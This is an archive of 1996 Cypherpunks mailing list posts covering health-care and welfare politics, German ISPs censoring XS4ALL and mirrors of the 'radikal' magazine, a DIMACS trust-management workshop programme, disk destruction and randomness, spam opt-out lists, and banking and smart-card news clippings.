insurance bureacracy required to manage much of the U.S. health care system
absorbs much of the money going into the system. Managing risk pool seperation
proves to be expensive, or perhaps just very profitable.

> Social safety nets prevent rioting by the lower classes, revolution and
> general civil disorder because they appease the masses.  Indeed this
> is a form of health and life insurance for the middle and upper classes.

Absolutely. And it is a scheme that many of the lower classes pay into. Since it
is to our mutual benefit (yours and mine), I choose not complain about it.

> Spreading the risk, by itself, does NOT reduce cost.  
> You must properly PRICE risk.

Agreed. But there is a balance between accurately pricing the risk and
minimizing the cost of the bureacracy that polices this pricing. 

There are also many ways to modify behaviour, not all of them direct. We only
need a correlation here, not causation. For example, high taxes on smoking and
drinking or spot checks for drunk driving. All of these correlate with a
reduction in high risk behaviour and a reduction in health costs.

Yes, there are people who will engage in high risk behaviour. Yes, they will
still receive treatment. No, it is not worth tracking down all of these people.

You may also get better privacy because no insurance company is collecting
personal data in order to minimize their risk. A Suspicious Persons List is only
one manifestation of this type of intrusion. This privacy issue may only
increase as genetic screening becomes widespread. 

There is much potential for moral hazard when the PRICE for your insurance is
affected by the accuracy of your disclosure. How will they ever know...

Fact: Canada spends less than the U.S. per capita on health care, while covering
more people in percentage terms.

Ciao,
James, qui pete les bretelles du Canada.

And he brought the present unto Eglon king of Moab: and Eglon was a 
very fat man. [Judges 3:17]

"Of all tyrannies a tyranny sincerely exercised for the good of its victims  
 may be the most oppressive. It may be better to live under robber barons  
 than under omnipotent moral busybodies. The robber baron's cruelty may  
 sometimes sleep, his cupidity may at some point be satiated; but those who  
 torment us for own good will torment us without end, for they do so with 
 the approval of their own conscience."   -  C.S. Lewis, _God in the Dock_ 

"A foolish consistency is the hobgoblin of little minds." - Emerson






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:51:03 +0800
To: "Asgaard" <cypherpunks@toad.com>
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <19960917185652765.AAA210@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Sep 1996 21:08:58 +0200 (METDST), Asgaard wrote:

>>The 70% already _are_ cutting the throats of the other 30%. It's called a
>>60%+ tax rate. This is the sum of: federal income tax, state income tax,

>Most of these taxes are not used for feeding the poor but to support
>the Nomenclatura of the Bureaucracy and we all want to get rid of that.

Quite true; I'd love to see the government run as a business, where some
departments might run out of money 6 months early if they aren't careful. It'd
be hard at first, but they'd have to change to survive...

>standalone women to make babies to get benefits was very bad. The
>Chinese system - less benefits the more children you have - is the
>way to go.

++agree

(Orwell also contributed other conventions. . .)

>>(The point being that people want more than "basic food and shelter," but
>>are often unwilling to make the commitments and sacrifices in their lives
>>to gain the wherewithal to earn significant salaries.)

>This is where we disagree. The real lazy ones are satisfied with a roof
>over there heads, a microwave oven for cooking pizza, a six-pack and
>a soap opera. Most people really do want to achieve something more in
>their lives.

How many of them are willing to go pick grapes for below minimum wage, since
they've carefully avoided learning anything remotely useful?  We have a ton of
illegal immigrants who are quite willing to do so.  The market is there, so why
aren't they working?

>>There is a basic error here, one that I see often. Who says that the
>>"anarcho-capitalists" will freely give away, say, some vast fraction of
>>their profits so as to subsidize the overall society? Any more so than the

>Not a vast portion, if the above_basics capitalistic economy blooms.
>Probably 10% would suffice - what was once paid to the church, the
>institution that traditionally has supported the ill and poor.

traditionally *raped* the ill and poor.  Nothing wrong with true charity, but
do you really think all the gold and art that (for instance) the Vatican
acquired, much of it during the dark ages,  was from giving contributions to
the poor?  Most of the time, they were the problem: "Give us money to buy
absolution or your loved ones will rot in Hell forever!"


# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Felipe Rodriquez <felipe@xs4all.nl>
Date: Tue, 17 Sep 1996 23:12:17 +0800
To: db-nl@dds.nl
Subject: German providers continue to censor XS4ALL network
Message-ID: <199609170958.LAA04976@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Released by:	XS4ALL Internet BV
Date	   :	17-september-1996
Author     :	Felipe Rodriquez (felipe@xs4all.nl)


			*** PRESS RELEASE ***


	GERMAN PROVIDERS CONTINUE TO CENSOR XS4ALL NETWORK


German providers have continued their ip-filtering actions against
dutch provider XS4ALL. These ip-filtering actions where started
after the German Authorities ordered the providers to block access
to a specific document on the XS4ALL website. The document is not
illegal in Holland, and is the property of one of XS4ALL's customers.
So far German authorities have not contacted XS4ALL, no official
requests where made to remove these documents from our server. 

Xs4all customers are prevented from communicating with German
internetusers, because Email is not passed through a number of German
internet routers. Xs4all customers are prevented from accessing German
websites. Therefore German providers, particularily EUnet Germany GmbH,
are violating article 10 of European Convention on Human Rights:
"Everyone has the right to freedom of expression. this right shall
include freedom to hold opinions and to receive and impart information
an ideas without interference by public authority and regardless of
frontiers." They are preventing our Xs4all subscribers to execute their
rights of free expression.

Some of our customers have terminated their account at Xs4all, 
because of these restrictions, that were imposed by German providers,
after an order from the German government. These restrictions have
caused a major disruption on the business interests of XS4ALL Internet BV.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 18 Sep 1996 06:18:32 +0800
To: coderpunks@toad.com
Subject: DIMACS Trust management workshop, Sept 30 - Oct 2.
Message-ID: <199609171605.MAA24438@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

Received: from amontillado.research.att.com (amontillado.research.att.com [135.205.42.32]) by nsa.research.att.com (8.7.3/8.7.3) with ESMTP id LAA24206 for <mab-local@nsa.research.att.com>; Tue, 17 Sep 1996 11:52:51 -0400 (EDT)
Received: from research.research.att.com (research.research.att.com [135.205.32.20]) by amontillado.research.att.com (8.7.5/8.7) with SMTP id LAA14378 for <mab@issr.research.att.com>; Tue, 17 Sep 1996 11:52:30 -0400 (EDT)
Received: from ns.research.att.com by research; Tue Sep 17 11:48:17 EDT 1996
Received: from henson.rutgers.edu by ns; Tue Sep 17 11:06:01 EDT 1996
Received: (from bquigley@localhost) by henson.rutgers.edu (8.6.12+bestmx+oldruq+newsunq+grosshack/8.6.12) id LAA26298; Tue, 17 Sep 1996 11:02:41 -0400
Date: Tue, 17 Sep 1996 11:02:41 -0400
From: Barbara Quigley <bquigley@dimacs.rutgers.edu>
Message-Id: <199609171502.LAA26298@henson.rutgers.edu>
To: dimacs-members@dimacs.rutgers.edu, local-list@dimacs.rutgers.edu,
        dimacs-dimacs@dimacs.rutgers.edu,
        dimacs-current-postdocs-industry@dimacs.rutgers.edu,
        dimacs-current-postdocs-univ@dimacs.rutgers.edu,
        dimacs-current-visitors@dimacs.rutgers.edu,
        rutgers-list@dimacs.rutgers.edu, theorynt@vm1.nodak.edu,
        finite-model-theory@informatik.rwth-aachen.de
Subject: DIMACS Workshop on Trust Management in Networks, Rutgers University, September 30 - October 2, 1996


DIMACS Workshop on Trust Management in Networks

September 30 - October 2, 1996

DIMACS, Rutgers University

- ----------------------------------------------------------------------------

Organizers:
     Ernie Brickell brickell@btec.com
     Joan Feigenbaum jf@research.att.com
     David Maher dpm@allegra.att.com

Theme:

The use of public-key cryptography on a mass-market scale requires
sophisticated mechanisms for managing trust. For example, any application
that receives a signed request for action is forced to answer the central
question ``Is the key used to sign this request authorized to take this
action?'' In certain applications, this question reduces to ``Does this key
belong to this person?'' In others, the authorization question is
considerably more complicated, and resolving it requires techniques for
formulating security policies and security credentials, determining whether
particular sets of credentials satisfy the relevant policies, and deferring
trust to third parties. This workshop covers all aspects of the trust
management problem. Relevant topics include but are not limited to:

   * General approaches to trust management
   * Languages, systems, and tools
   * Certificates and public-key infrastructure
   * Formal models and analysis
   * Trust management in specific application domains; including but not
     limited to:
        o Banking
        o E-mail
        o Internet commerce
        o Licensing
        o Medical information systems
        o Mobile programs and ``code signing''
        o Revocation of cryptographic keys

For more information:

Information about local arrangements, travel, lodging and registration can
be found at http://dimacs.rutgers.edu/Workshops/Management. Those without
WWW access can contact Pat Pravato at 908-445-5929 or
pravato@dimacs.rutgers.edu.

This workshop is part of DIMACS Special Year on Networks. Information about
the Special Year on Networks can be found at DIMACS WWW site:
http://dimacs.rutgers.edu or by contacting the center.
__________________
Program:

Monday, September 30, 1996

 8:15  Continental breakfast

 9:00  Welcome to DIMACS
       Fred Roberts, DIMACS Director

 9:15  What is "Trust Management," and what are the Workshop Goals?
       Joan Feigenbaum, AT&T Laboratories

 9:45  Let a Thousand (Ten Thousand?) CAs Reign
       Stephen Kent, BBN Corporation

10:45  Break

11:00  The PolicyMaker Approach to Trust Management
       Matt Blaze, AT&T Laboratories
       (Joint work with J. Feigenbaum and J. Lacy)

12:00  Lunch

 1:15  SDSI: A Simple Distributed Security Infrastructure
       Butler Lampson, Microsoft
       (Joint work with R. Rivest)

 2:15  SPKI Certificates
       Carl Ellison, Cybercash

 3:15  Break

 3:45  Panel Discussion
       Moderator: David Maher, AT&T Laboratories
       Panelists: Blaze, Ellison, Kent, and Lampson

 5:30  Wine and cheese

Tuesday, October 1, 1996

 8:15  Continental Breakfast

 9:00  Using PICS Labels for Trust Management
       Rohit Khare, World Wide Web Consortium

 9:30  Managing Trust in an Information-Labeling System
       Martin Strauss, Iowa State University
       (Joint work with M. Blaze, J. Feigenbaum, and P. Resnick)

10:00  Trust Management in Web Browsers, Present and Future
       Ed Felten, Princeton University
       (Joint work with D. Dean and D. Wallach)

10:30  Break

10:45  IBM Cryptolopes, SuperDistribution, and Digital Rights Management
       Marc A. Kaplan, IBM Watson Research Center

11:15  Requirements and Approaches for Electronic Licenses
       David Maher, AT&T Laboratories

11:45  PathServer
       Michael Reiter, AT&T Laboratories
       (Joint work with S. Stubblebine)

12:15  Lunch

 1:30  Inferno Security
       David Presotto, Bell Labs -- Lucent Technologies

 2:00  Transparent Internet E-mail Security
       Raph Levien, University of Calfornia at Berkeley
       (Joint work with L. McCarthy and M. Blaze)

 2:30  Secure Digital Names
       Stuart Haber, Bellcore
       (Joint work with S. Stornetta)

 3:00  Break

 3:30  Untrusted Third Parties: Key Management for the Prudent
       Mark Lomas, Cambridge University
       (Joint work with B. Crispo)

 4:00  Distributed Trust Management using Databases
       Trevor Jim, University of Pennsylvania
       (Joint work with C. Gunter)

 4:30  Distributed Commerce Transactions: Structuring
       Multi-Party Exchanges into Pair-wise Exchanges
       Steven Ketchpel, Stanford University
       (Joint work with H. Garcia-Molina)

Wednesday, October 2, 1996

 8:15  Continental Breakfast

 9:00  Policy-Controlled Cryptographic Key Release
       David McGrew, Trusted Information Systems, Inc.
       (Joint work with D. Branstad)

 9:45  An X.509v3-based Public-Key Infrastructure for
       the Federal Government
       William Burr, Nat'l. Inst. of Standards and Technology

10:15  Break

10:30  The ICE-TEL Public-Key Infrastructure and
       Trust Model
       David Chadwick, Salford University

11:00  A Distributed Trust Model
       Alfarez Abdul-Rahman, University College, London
       (Joint work with S. Hailes)

11:30  On Multiple Statements from Trust Sources
       Raphael Yahalom, Hebrew University and MIT

12:00  Lunch

 1:00  Off-line Delegation in a Distributed File Repository
       Arne Helme, University of Twente
       (Joint work with T. Stabell-Kul)

 1:30  Operational Tradeoffs of Aggregating Attributes in
       Digital Certificates
       Ian Simpson, Carnegie Mellon University

 2:00  Trust Management for Mobile Agents
       Vipin Swarup, Mitre
       (Joint work with W. Farmer and J. Guttman)

 2:30  Break

 3:00  Trust Management in ERLink
       Samuel Schaen, Mitre

 3:30  Linking Trust with Network Reliability
       Y. Desmedt, University of Wisconsin at Milwaukee
       (Joint work with M. Burmester)

 4:00  Trust Management Under Law-Governed Interaction
       Naftaly Minsky, Rutgers University
       (Joint work with V. Ungureanu)

 4:30  Tools for Security Policy Definition and Implementation
       Polar Humenn, Blackwatch Technology, Inc.






------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 07:31:03 +0800
To: "dlv@bwalk.dm.com>
Subject: Re: SPL -- Suspicious Persons List
Message-ID: <19960917190833984.AAA75@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Sep 96 17:36:49 EDT, Dr.Dimitri Vulis KOTM wrote:


>> unjust if the company was bought out and the new owner decided to sack
>> all black people and people called "Perry". You were the one who brought
>> up the issue of fairness.

>The owner should be able to do that without interference from any gubment.

Yes.  If they manage to survive economically while snubbing a productive chunk
of the general population in addition to a loon, good for them.  If their
product still sells, inspite of negative publicity it's probably the market
leader.  OTOH, I think there should be some basic safeguards against the
formation of 'company towns' or similar constructs.  A free market is rarely a
given.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 07:02:43 +0800
To: "Bill Frantz" <dfloyd@io.com>
Subject: Re: Erasing Disks
Message-ID: <19960917191232859.AAA212@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Sep 1996 20:11:45 -0500 (CDT), Douglas R. Floyd wrote:

>> >But shredding the floppy?  No need to classify that, no secrets leaked

>> Burn after shredding, or you have a puzzle fan reassembling the shredded disk.

>Actually, taking the cookie portion out, putting it on an inverted cup so
>its in the center of the microwave, then letting it cook for 30 seconds
>does the job quite well =)

I've always been a fan of applying lighter fluid in a fashion similar to the
way the allies applied napalm to Dresden.  It's more satisfying... <g>

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 08:58:45 +0800
To: "EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Uses of Computational Chaos
Message-ID: <19960917191720703.AAA221@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Sep 1996 23:37 EDT, E. Allen Smith wrote:

>	It is reasonably obvious that using _computational_ (as opposed to
>physical) chaos won't increase entropy. But how about using it to make an
>attacker work harder to use any flaws in your method of generating random
>bits? As a simplistic example, say that the scribble window you're using tends
>to result in a 1 for each 3rd bit. Nice and simple for an attacker to exploit.

Supposing, too, that you know these weaknesses, would using separate algorithms
for different portions of the number work well?

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 08:44:16 +0800
To: "E. Allen Smith" <jf_avon@citenet.net>
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <19960917191852828.AAA142@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Sep 1996 23:58 EDT, E. Allen Smith wrote:

>fetters to win. (In the ultimate extreme, I include gun control under the
>fetters that communism/etcetera need to win... the "redistribution" from
>producers ("rich") to welfare drones ("poor") during the Rodney King riots
>would have been nicely prevented by some shopkeepers with automatic weapons.

As I recall this actually happened in a couple cases, didn't it?

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 08:25:20 +0800
To: "Bill Stewart" <cypherpunks@toad.com>
Subject: Re: 56 kbps modems
Message-ID: <19960917192157468.AAA195@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Sep 1996 01:31:19 -0700, Bill Stewart wrote:

>and still get the original 56kbps back out.  But if they can, well,
>yee-hah, ISDN is nearly dead :-)  (Not totally dead; the signalling is
>still useful for some applications, the convenience of two channels on
>one wire pair is nice, and the fact that people can get 56kbps without
Also, can't you add ISDN b-channels ? (I.e. get another 64kps channel)
>the phone company's help will pressure them into offering ISDN for
>a lower price in areas where the Phone Company's idea of "all the market 
>will bear" is substantially higher than voice pricing.)

ISDN is more elegant; this sounds like a 'kludge' of sorts. OTOH, we've all
seen how well a cheap kludge can do, right?

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Wed, 18 Sep 1996 00:49:41 +0800
To: tank@xs4all.nl (tank)
Subject: radikal update 17-9-1996
Message-ID: <199609171032.MAA05213@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL of the main radikal-site has changed:

	*********************************
	* http://www.xs4all.nl/~radikal *
	*********************************

We need more mirrors to stop Germany censoring the radikal and the
internet. As you can see, free speach is not a gift, but something you
have to fight for. Join the struggle !

If you got a mirror up and running let it know. Send your url to:

		tank@xs4all.nl

***********************************************************************
** Radikal Mirrors **						     **
***********************************************************************

Receive Radikal 154 by email: 

     Send a empty message to radikal@xs4all.nl
     and you receive issue 154 by mail. 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Read the radikal by calling the netherlands (25 numbers).
     All telefonnr. are listed at the end of this mail.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download the radikal archive:

http: 

     http://www.xs4all.nl/~bslash/radikal.tar.gz Radikal-site unix
     http://www.xs4all.nl/~bslash/radi.zip Radikal-site dos-zip archive

ftp: 

     ftp://utopia.hacktic.nl/pub/replay/pub/incoming

Radikal 154 in plaintext ASCII 

     http://www.xs4all.nl/~radikal/radi154.tgz Radikal 154 unix 

     http://www.xs4all.nl/~radikal/radi154.zip Radikal 154 dos-zip  

If you got your mirror up and running let us know 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Special mirror: 
     de.soc.zensur 
     de.org.politik.spd 
     http://www.altavista.digital.com usenet-search for radikal.zip
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Radikal-sites: 

   1.http://www.xs4all.nl/~radikal

   2.http://burn.ucsd.edu/%7Eats/RADIKAL/ 
     Arm the Spirit statement "Radikal Mirror Site At ATS WWW Page" 

   3.http://www.jca.or.jp/~taratta/mirror/radikal/ 

   4.http://www.serve.com/~spg/ 

   5.http://huizen.dds.nl/~radikal 

   6.http://www.canucksoup.net/radikal/index.html 

   7.http://www.ecn.org/radikal 

   8.http://www.well.com/~declan/mirrors/ 

   9.http://www.connix.com/~harry/radikal/index.htm 

  10.http://www.ganesa.com/radikal/ 

  11.http://www.denhaag.org/~radikal 

  12.http://www.knooppunt.be/~daniel/radikal 

  13.http://emma.unm.edu/radikal 

  14.http://www.tacacs.com/radikal/" 

  15.http://www.dsvenlo.nl/~vvd/radikal/ 

  16.http://www.why.net/home/static/radi 

  17.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 

  18.http://www.xs4all.nl/~jeroenw/radikal/ 

  19.http://home.ipr.nl/~radikal/ 

  20.http://www.dreamy.demon.co.uk/occam/ 

  21.http://www.ibmpcug.co.uk/~irdial/live_free/ 

  22.http://zero.tolerance.org/radi/index.htm 

  23.http://www.meaning.com/library/radikal/ 

  24.http://www.xs4all.nl/~irmed/radikal/ 

  25.http://www.walli.uwasa.fi/~tviemero/radikal 

  26.http://www.sko.it/~sfede/radi/index.htm 

  27.http://www.bart.nl/~sz/index.html 

  28.http://bellp.med.yale.edu/index.htm 

  29.http://www.euronet.nl/users/funest/radi/index.htm 

  30.http://fine.com/~rsr/radikal 

  31.http://www.lab.net/radikal 

  32.http://www.charm.net/~gbarren/radikal 

  33.http://login.datashopper.dk/~pethern/radikal/ 

  34.http://www.interlaw.com 

  35.http://hyperreal.com/~rich/radikal/index.html 

  36.http://www.citinv.it/iniziative/info/radikal/ 

Phone: Call and login as "new".
So first dail the international number +31 (hollands international code)
and than one of these numbers.

Amsterdam               Zoetermeer              Maarssen        
020 5350535, V.34       079 3611011, V.34       0346 550455, V.34 
020 4223422, UUCP       079 3600800, ISDN PPP   0346 553613, ISDN PPP
020 6265060, ZyXEL      079 3630569, ISDN X.75  0346 555285, ISDN X.75 
020 4229700, ISDN PPP 
020 4206782, ISDN X.75 

Hoorn                   Geleen                  Leeuwarden
0229 212177, V.34       046 4789478, V.34       058 2157815, V.34 
0229 219717, ISDN PPP   046 4230555, ISDN PPP   058 2130910, ISDN PPP 

Goes                    Assen
0113 252900, V.34       0592 331531, V.34
0113 270110, ISDN PPP   0592 331278, ISDN PPP

Willemstad              Deurne
0168 472472, V.34       0493 323344, V.34 
0168 476472, ISDN PPP   0493 351566, ISDN PPP




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 18 Sep 1996 09:30:44 +0800
To: cypherpunks@toad.com
Subject: Re: Child pornography -- Expert witness for Federal jury trial
Message-ID: <199609171941.MAA09023@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A Cyber-Liberties Advocate writes:

> I just got a call from two Federal Public Defenders whose client is
> charged with possession of child pornography stored in the /tmp
> directory of a Unix system, in a zip'd file. (These lawyers seem to be
> reasonably cyber-savvy, and told me they're following what I've been
> writing about cyber-liberties.)

Is this the Leachman/UPitt thing?  

---
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 18 Sep 1996 06:33:35 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Spam blacklist project
In-Reply-To: <7aLDuD77w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.960917124148.16319C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> You haven't answered my question, Lues. If the list of e-mail addresses of
> people who DON'T want junk e-mail is made available for _free for FTP,
> together with a tool for spammers to scrub their mailing lists of these
> addresses, and an easy way for anyone to add his or her address to this
> list for _free, then how would Slaton _sell this list to anyone?
> 

Easily. What percentage of, er, mass internet advertisers would know that 
this site exists? I assume it would become a very large list, and would 
make a very atractive target for someone who wanted to provide email 
addresses to others for a fee.  

btw - my girlfriend just wandered by, and read this over my shoulder. 
She's the network operations center mgr. for a large ISP. She just got a 
complaint last night from a, er, Internet Direct Mail Marketer, who 
claimed that his outbound mail queue was filling up, and this was somehow 
the ISP's fault that he couldn't reach certain addresses on a list he had 
recently purchased. Sorta like calling the phone company and complaining 
that some numbers on a telemarketing list were disconnected, or that 
nobody answered :)

I'd say it's a safe bet that the unscrupulous could easily sell a large, 
up-to-date list of email addresses of people who DON'T want junk email to 
people who want to send such mail.

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 09:20:11 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Some crypto-relevant wire clippings for a change
Message-ID: <u2seuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


WITH INTUIT ACQUISITION, CHECKFREE WILL SERVICE ONE MILLION

CheckFree Corporation announced an agreement to acquire Intuit Services
Corporation (ISC) for 12.6 million shares of common stock in CheckFree
Corporation. Intuit Services Corporation is a wholly owned subsidiary of
Intuit Inc. Based on the September 13 closing price of 18 1/16 for
CheckFree stock, the indicated price CheckFree is paying for ISC is $227
million. After completion of the acquisition, CheckFree will provide
home banking and bill payme nt services to over 180 financial
institutions. The acquisition will bring CheckFree's base of home
banking and bill payment users to over one million. CheckFree
Corporation markets its electronic commerce processing capabilities
exclusively to financial institutions, which, in turn, use them to
provide home banking and bill payment services to their customers.
CheckFree's approach is behind the scenes: providing banking and bill
payment transaction processing.

-- PR Newswire, 9/16/96

French Bank Note Printer Buying U.S. Card Maker

By VALERIE BLOCK

Francois-Charles Oberthur Group of France, the third-largest bank note
printer in the world, has agreed to purchase Kirk Plastic Co., the
second- largest card manufacturer in the United States.

The deal, announced last week, follows the sale of other North American
plastic card producers to European companies over the last two years.

Gemplus bought a U.S. manufacturing base from DataCard Corp., and
competitor Schlumberger acquired Malco Plastics. Giesecke & Devrient of
Germany bought Security Card Systems of Canada, and De La Rue of Great
Britain bought McCorquodale.

Los Angeles-based Kirk Plastic had announced a joint venture with Orga
Card Systems Inc., a German smart card company, in July 1995, but those
negotiations were terminated several months ago.

Kirk R. Hyde, president of Kirk Plastic, a 77-year-old family-owned
business, said Oberthur made a better partner. Mr. Hyde, 53, will sign a
three-year employment contract with Oberthur, also a family business,
which is 70%-owned by Jean-Pierre Savare. Kirk Plastic will keep its
name and 2,500 employees.

Mr. Hyde said he'd had reservations about selling his company, but "if
we don't make the deal, we could be out of business in five years if
smart cards take over."

He said his competitors were purchased by large European concerns driven
by smart cards and technological changes. "I could no longer keep up
with investments to remain competitive," he added.

The new owner will infuse capital and technology, and add distribution
channels. Mr. Hyde would not disclose specific terms of the deal, which
is scheduled to close within 30 days. Industry observers see the
European invasion as concrete evidence that smart cards are gaining
ground in the United States.

"It's another indication that many companies are betting millions that
the U.S. market will develop very quickly," said Dan Cunningham, senior
vice president of business development at Phoenix Planning and
Evaluation Ltd., a Rockville, Md.-based consulting firm.

Mr. Cunningham headed Gemplus' U.S. subsidiary before it acquired the
DataCard manufacturing facilities.

In Atlanta, Visa is testing Visa Cash, the stored-value smart card
system launched in conjunction with the Olympic Games.

By early next year, Visa will join with MasterCard, Citibank, and Chase
Manhattan Bank in a potentially crucial "interoperability" test on
Manhattan's Upper West Side.

In other signs of U.S. progress in the smart card industry: Wells Fargo
and Co. and AT&T Universal Card Services became owners of Mondex
International, the company formed by National Westminster Group of
London; several universities are implementing smart card systems on
campuses in conjunction with banks; and U S West rolled out card-reading
phones in several western states.

Even so, smart cards are not producing income here. Mr. Cunningham said
acquisitions of profitable companies like Kirk can generate funding for
early smart card development.

Kirk Plastic, with annual revenues of more than $25 million, said it
will produce 125 million magnetic stripe cards this year.

Oberthur, an international producer of lottery tickets and plastic cards
in addition to bank notes, participates in a joint venture, CP8
Oberthur, which is one-third owned by Bull Group of France, another top
smart card producer with U.S. facilities.

CP8 Oberthur produces 50 million smart cards annually in two French
factories, supplying nearly 70% of French bank cards.

Oberthur's U.S. subsidiary, Banknote Corporation of America, is the
second-largest security printer in the United States.




ComputerWorld: August 26, 1996

Opening Soon: Microsoft National Bank

If Bill Gates can persuade the Justice Department to go easy on
Microsoft's monopoly in PC operating systems, just imagine how easily he
could persuade regulatory agencies to grant him a bank charter. Give up
a few tons of documents, hold several meetings that consist of silly
bureaucratic bantering and voila! he's got an $ 18 billion de novo bank
with millions of online "branches" overnight. And not a trowel of mortar
needed.

Why speculate about the notion of a Microsoft bank? Because Gates is an
impatient man. He doesn't believe bankers are moving fast enough to make
home banking a success. The entrepreneurial instinct of such a highly
successful person suggests that if conventional approaches don't work,
he will bypass them and take over. Gates is a helluva marketer and
promoter; he could sell the concept with pizzazz.

There's also a bit more to this proposition than meets the eye. A recent
phone call from Microsoft's lead person in the home-banking fray
revealed some interesting insights. First, the only reason this
well-informed and well-connected gentleman called me is that he knows
how I feel about home banking it's a solution searching for a problem. I
think he's trying to swing me

(and at least one other highly visible skeptic) over to his camp.

Second, the executive said, home banking has to be sold aggressively by
banks. He figures consumers aren't likely to rush in and sign up. He's
absolutely correct about the absence of a rush.

The part about having to sell online banking aggressively to consumers
worries me. If that's the case, then home banking is a cat that has
already used up eight lives in the past 25 years. Every major bank has
tried home banking and has failed. If the last chance depends on the
typical banker's sales skills, then home banking is dead for sure.

Consumers are smarter than ever. Give them good reasons to switch, and
they don't have to be pushed.

Home banking doesn't yet provide compelling reasons.

Today's consumers are in love with the checkbook. They aren't
complaining about checks. (Banks, of course, hate checks because they're
expensive to process.) Consumers don't want to expose their spending
habits on the Internet,either. They just aren't ready to say, "I think
I'll jump on the Internet today and pay my bills."

The promoters of home banking point to surveys that show the increasing

penetration of PCs in U.S. households. But that doesn't mean those PCs
will be used for online banking. If a poll said 80% of U.S. homeowners
have a back yard, does it mean they all want to plant tomatoes? Even
banking's technocrats don't do online banking when they go home.

If compelling reasons to bank from home are missing, then the next best
chance for success will depend on a cultural shift.

Maybe the future yuppies, who are now in grade school, will embrace home
banking just because it fits in to their electronic lifestyles. The
"Gomwatms" grumpy old men with all the money will eventually fade out of
the picture.

Home banking is a sure thing, once we find its right decade.

